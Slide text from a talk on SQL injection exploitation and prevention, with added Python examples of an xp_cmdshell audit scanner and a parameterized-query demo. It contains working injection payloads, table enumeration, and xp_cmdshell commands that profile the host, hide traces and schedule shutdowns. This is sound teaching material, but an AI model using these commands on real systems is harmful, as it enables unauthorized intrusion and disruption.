Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording, which can be found at http://vimeo.com/gmaran23
3. Disclaimer
Techniques and tools in this presentation should be used or applied on an application only with prior consent of the application's owner. Illegal otherwise.
4. Sqli – Media coverage
http://pastebin.com/HUjZPaF3
5. Sqli – Media coverage
http://thepiratebay.se/torrent/6443601
10. Sqli – Why does it exist?
Yeah! I can develop/deploy without restrictions, I have full access.
Thanks bro! I am your uninvited database administrator now. I owe you, and your data.
I like them admin rights
11. Sqli – Why does it exist?
Conglomeration of Sensitive Data
Would you keep all your belongings in your home, or would you keep some in your safe deposit box?
Blindly Trusting Unsanitized User Input
"Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading."
12. Sqli – Why does it exist?
• It's not always about a developer knowing better; there are tons and tons of legacy code
• Remember, DBAs write SQL too
• No strict access control policies
• Windows based/desktop based applications are directly ported to the web
• Developers still don't know the complete truths about Sqli
13. Sqli 101
../Products?name=rat
SELECT 1 FROM Products WHERE ProductName = 'rat'
../Products?name=rat' or 1=1 --
SELECT 1 FROM Products WHERE ProductName = 'rat' or 1=1 -- '
The closing quote is commented out and the condition collapses to: or true
19. Sqli E
-- table enumerator
SELECT TOP 1 Convert(INT, NAME)
FROM sys.tables
WHERE object_id = (
SELECT TOP 1 object_id
FROM (
SELECT TOP 2 object_id
FROM sys.tables
ORDER BY object_id
) AS TEMP
ORDER BY object_id DESC
)
Enumerating in MySQL is very easy with OFFSET.
20. ORMs and SPs Loopholes
http://sqli:8020/SqliORM/ProductSearch
21. It's not an ORM's problem to have you loaded with features
ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
AS
BEGIN
DECLARE @query VARCHAR(400)
SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
PRINT @query
EXEC (@query)
END
GO
-- Execute good
EXEC SearchProducts 'chai'
GO
-- Execute bad
EXEC SearchProducts 'chai%'' or 1=1--'
GO
22. Fixing SP Loopholes
ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
AS
BEGIN
DECLARE @safequery NVARCHAR(400)
DECLARE @params NVARCHAR(200)
SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''
SET @params = N'@param1 NVARCHAR(200)';
EXECUTE SP_EXECUTESQL @safequery
,@params
,@param1 = @Item
END
GO
-- Execute bad (the input is bound as @param1, so the quote and the comment stay inside the LIKE pattern)
EXEC SearchProductsBetter 'chai%'' or 1=1--'
GO
25. Profiling Host OS
-- play time!
exec xp_cmdshell 'tasklist'
exec master.dbo.xp_cmdshell 'whoami'
exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'
26. Profiling Host OS
-- enumerate and remove trace
create table tempsz(temp varchar(MAX));insert into tempsz exec xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;
-- enumerate and leave trace
create table tempsz(temp varchar(MAX));insert into tempsz exec xp_cmdshell 'tasklist';
-- get enumerated information and remove trace
select temp from tempsz;drop table tempsz;
27. Profiling Host OS
-- schedule a shutdown and send message to the user named maran
exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes'
-- abort the shutdown and send message to the user named maran
exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'
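From the defender's side, the activity on slides 25 to 27 is exactly what a database audit should surface. The following is an added example, not part of the presentation: a small scanner that flags xp_cmdshell calls (bare, master.dbo.xp_cmdshell or master..xp_cmdshell) in captured T-SQL statements, extracts the OS command that was passed, flags the sp_configure call that switches xp_cmdshell on (the feature ships disabled), and flags the insert-into-table staging pattern from slide 26. The statement list is constructed sample input, and the regexes, function names and finding kinds are this example's own.

```python
import re

# Constructed sample of captured T-SQL statements, in the shape a SQL Server
# audit or Extended Events session might record them. Invented for this
# example; lines 2-5 mirror the xp_cmdshell usage shown on the slides.
SAMPLE_STATEMENTS = [
    "SELECT * FROM Products WHERE ProductName LIKE '%chai%'",
    "exec xp_cmdshell 'tasklist'",
    "exec master.dbo.xp_cmdshell 'whoami'",
    "EXEC master..XP_CMDSHELL 'netsh advfirewall firewall show rule name=all profile=public'",
    "create table tempsz(temp varchar(MAX));insert into tempsz exec xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "SELECT name FROM sys.tables",
]

# xp_cmdshell may be called bare, as master.dbo.xp_cmdshell or as master..xp_cmdshell.
_PREFIX = r"(?:\bmaster\s*\.\s*(?:dbo\s*)?\.\s*)?"

# A call starts the batch, follows a ';' or follows EXEC/EXECUTE. The quoted
# argument, if present, is captured; T-SQL doubles embedded single quotes.
XP_CMDSHELL_CALL = re.compile(
    r"(?:\bexec(?:ute)?\s+|^\s*|;\s*)" + _PREFIX +
    r"\bxp_cmdshell\b\s*(?:'((?:[^']|'')*)')?",
    re.IGNORECASE)

# Turning the feature on: it is off by default and enabled through sp_configure.
XP_CMDSHELL_ENABLE = re.compile(
    r"\bsp_configure\b\s*'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE)

# The staging pattern from slide 26: command output captured into a table.
INSERT_EXEC_CMDSHELL = re.compile(
    r"\binsert\s+into\s+(\w+)\s+exec(?:ute)?\s+" + _PREFIX + r"\bxp_cmdshell\b",
    re.IGNORECASE)


def scan_statement(statement):
    """Return a list of (kind, detail) findings for one captured statement."""
    findings = []
    for m in XP_CMDSHELL_CALL.finditer(statement):
        command = (m.group(1) or "").replace("''", "'")  # undo T-SQL quote doubling
        findings.append(("xp_cmdshell", command))
    if XP_CMDSHELL_ENABLE.search(statement):
        findings.append(("xp_cmdshell_enabled", ""))
    for m in INSERT_EXEC_CMDSHELL.finditer(statement):
        findings.append(("insert_exec_staging", m.group(1)))
    return findings


def scan_log(statements):
    """Scan a sequence of statements; returns (line_no, kind, detail) tuples."""
    report = []
    for line_no, statement in enumerate(statements, 1):
        for kind, detail in scan_statement(statement):
            report.append((line_no, kind, detail))
    return report


if __name__ == "__main__":
    for line_no, kind, detail in scan_log(SAMPLE_STATEMENTS):
        print(f"line {line_no}: {kind} {detail!r}")
```

The call pattern deliberately requires EXEC, a batch start or a ';' in front of xp_cmdshell so that the quoted 'xp_cmdshell' inside the sp_configure statement is reported once, as an enable event, rather than as a second call. On a real server the same statements would be collected by SQL Server Audit or an Extended Events session rather than from a hard-coded list.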
48. Core Defense
CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
AS
DECLARE @query NCHAR(64)
-- allow-list: only four digits ever reach the dynamic query
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
BEGIN
SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
EXEC (@query)
END
RETURN
-- Or, better yet, force an integer parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)
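To show the Sqli 101 query on slide 13 and the two core defences on slide 48 side by side in something runnable, here is an added example that is not part of the presentation. It uses Python's sqlite3 module with a constructed in-memory stand-in for the Products and cust tables, the same rat' or 1=1 -- payload as the slide, and the same four-digit allow-list as dbo.doQuery; binding a parameter here plays the role that @params and sp_executesql play on slide 22. All function names and sample rows are this example's own.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the Products and cust tables on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProductName TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?)",
                     [("rat",), ("chai",), ("tofu",)])
    conn.execute("CREATE TABLE cust (id INTEGER, ccnum TEXT)")
    conn.executemany("INSERT INTO cust VALUES (?, ?)",
                     [(1001, "4111-0000-0000-0001"), (1002, "4111-0000-0000-0002")])
    return conn


def search_vulnerable(conn, name):
    # Slide 13 in miniature: the request parameter is pasted into the SQL text,
    # so a value such as  rat' or 1=1 --  rewrites the WHERE clause and comments
    # out the closing quote.
    sql = "SELECT ProductName FROM Products WHERE ProductName = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, name):
    # The value travels as a bound parameter: the SQL text never changes, and the
    # database compares ProductName against the whole string, quotes and all.
    sql = "SELECT ProductName FROM Products WHERE ProductName = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Same allow-list as the LIKE '[0-9][0-9][0-9][0-9]' test in dbo.doQuery.
FOUR_DIGITS = re.compile(r"[0-9]{4}")


def lookup_ccnum_vulnerable(conn, customer_id):
    # dbo.doQuery's dynamic query with the validation step left out.
    sql = "select ccnum from cust where id = '" + customer_id + "'"
    return [row[0] for row in conn.execute(sql)]


def validate_customer_id(customer_id):
    # The allow-list step: anything that is not exactly four digits is rejected
    # before it gets near a query. Returns the id as an int on success.
    candidate = customer_id.strip()
    if not FOUR_DIGITS.fullmatch(candidate):
        raise ValueError("customer id must be exactly four digits")
    return int(candidate)


def is_valid_customer_id(customer_id):
    try:
        validate_customer_id(customer_id)
        return True
    except ValueError:
        return False


def lookup_ccnum_typed(conn, customer_id):
    # The "force an integer parameter" variant: only an int is accepted and it is
    # bound, so there is no attacker-controlled text to splice into the statement.
    if isinstance(customer_id, bool) or not isinstance(customer_id, int):
        raise TypeError("customer id must be an int")
    rows = conn.execute("select ccnum from cust where id = ?", (customer_id,))
    return [row[0] for row in rows]


def lookup_ccnum(conn, customer_id):
    # Both defences layered, as the slide recommends: allow-list, then bind.
    return lookup_ccnum_typed(conn, validate_customer_id(customer_id))


if __name__ == "__main__":
    db = make_db()
    for payload in ("rat", "rat' or 1=1 --"):
        print(repr(payload), "vulnerable:", search_vulnerable(db, payload),
              "parameterized:", search_parameterized(db, payload))
    print("vulnerable cust lookup:", lookup_ccnum_vulnerable(db, "' or 1=1 --"))
    print("allow-list accepts \"' or 1=1 --\"?", is_valid_customer_id("' or 1=1 --"))
```

The vulnerable product search returns every row for the injected value while the parameterized one returns nothing, because no product is literally named rat' or 1=1 --. For the card lookup the allow-list rejects the payload before any SQL is built, and the typed variant cannot be handed a string at all.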
50. Core Defense
Encrypt data to prevent disclosure when physical database files are stolen.
1. Encryption does not do a darn thing to protect you from direct Sqli
2. Encryption only protects you from Sqli induced attacks
57. What now?
Sqli Cheatsheet http://ferruh.mavituna.com/sql-injectioncheatsheet-oku
Dynamic queries in T-SQL http://www.sommarskog.se/dyn-search2005.html
http://www.sommarskog.se/dyn-search2008.html
58. End of the world
Watch the screen recording of this presentation at my vimeo channel
Devouring Security – Sql Injection Part 1 http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 http://vimeo.com/85256464